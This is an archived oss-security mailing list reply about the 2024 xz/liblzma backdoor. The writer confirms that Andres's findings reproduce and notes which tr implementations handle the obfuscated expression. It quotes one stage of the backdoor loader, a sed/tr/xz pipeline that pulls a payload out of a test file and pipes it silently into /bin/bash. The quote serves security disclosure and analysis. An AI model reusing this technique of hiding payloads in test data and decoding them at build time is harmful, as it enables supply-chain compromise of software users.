Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <d9f8fe3e-4403-422e-be02-cdbae7d43e77@gmx.ch>
Date: Fri, 29 Mar 2024 21:33:57 +0100
From: sjw@....ch
To: oss-security@...ts.openwall.com
Subject: Re: backdoor in upstream xz/liblzma leading to ssh
 server compromise

Hi Andres,

Thank you for sharing your findings, I'm able to reproduce your results.

 > which ends up as
 > ...; sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr "	 
\-_" " 	_\-" | xz -d | /bin/bash >/dev/null 2>&1; ...
 >
 > Leaving out the "| bash" that produces
 >
 > ####Hello####
 > [...]


The expression in the tr command might be a bit tricky to copy the 
report because of the whitespace characters. The original expression is 
found here:

https://salsa.debian.org/debian/xz-utils/-/blob/46cb28adbbfb8f50a10704c1b86f107d077878e6/m4/build-to-host.m4#L95

This kind of expression is not supported by BusyBox' implementation of 
'tr'. GNU's and uutils' coreutils both worked for me.

Download attachment "OpenPGP_signature.asc" of type "application/pgp-signature" (841 bytes)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.